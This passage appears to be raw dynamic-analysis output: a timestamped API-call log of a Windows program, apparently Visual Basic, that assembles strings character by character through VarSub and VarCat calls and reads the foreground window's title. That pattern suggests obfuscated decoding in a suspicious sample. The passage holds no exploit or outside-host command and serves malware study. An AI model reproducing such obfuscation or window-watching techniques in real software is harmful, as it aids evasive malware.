lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.991] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.991] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.992] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0177.992] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.992] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.993] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.993] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.993] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.994] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.994] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.995] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.995] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.996] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.000] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.001] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.001] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.001] GetForegroundWindow () returned 0x102c2 [0178.002] GetLastError () returned 0x0 [0178.002] SysStringLen (param_1=" ") returned 0xff [0178.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.002] SysStringLen (param_1=" ") returned 0xff [0178.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.002] GetWindowTextA (in: hWnd=0x102c2, lpString=0x11644c4, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0178.002] GetLastError () returned 0x0 [0178.003] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.003] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0178.003] SysStringLen (param_1="Acti") returned 0x4 [0178.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Acti", cchWideChar=5, lpMultiByteStr=0x116859c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acti", lpUsedDefaultChar=0x0) returned 5 [0178.004] SetWindowTextA (hWnd=0x103c4, lpString="Acti") returned 1 [0178.004] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0178.004] GetFocus () returned 0x0 [0178.004] lstrlenA (lpString="Acti") returned 4 [0178.004] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0178.004] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=5 | out: lpString="Blan") returned 4 [0178.004] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0178.004] GetFocus () returned 0x0 [0178.004] lstrcmpA (lpString1="Blan", lpString2="Acti") returned 1 [0178.005] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.005] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0178.005] IsWindow (hWnd=0x103c4) returned 1 [0178.005] IsWindow (hWnd=0x103c4) returned 1 [0178.006] IsWindow (hWnd=0x103c4) returned 1 [0178.006] IsWindow (hWnd=0x103c4) returned 1 [0178.006] GetFocus () returned 0x0 [0178.006] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0178.007] GetFocus () returned 0x0 [0178.007] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0178.007] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0178.007] GetFocus () returned 0x0 [0178.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0178.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=5 | out: lpWideCharStr="Acti") returned 5 [0178.007] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.007] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.009] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0178.009] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.009] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0178.010] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.010] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0178.011] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.049] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.049] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.050] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.050] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.051] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0178.051] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.052] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.052] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.053] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.053] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.054] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.054] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.055] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.055] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.056] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.056] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.056] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.057] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.058] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.058] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.085] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0178.085] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.085] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.086] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.086] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.087] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.087] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0178.088] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.088] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.088] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.089] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.089] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.090] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.091] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.093] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.093] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.093] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.094] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.094] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.095] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) 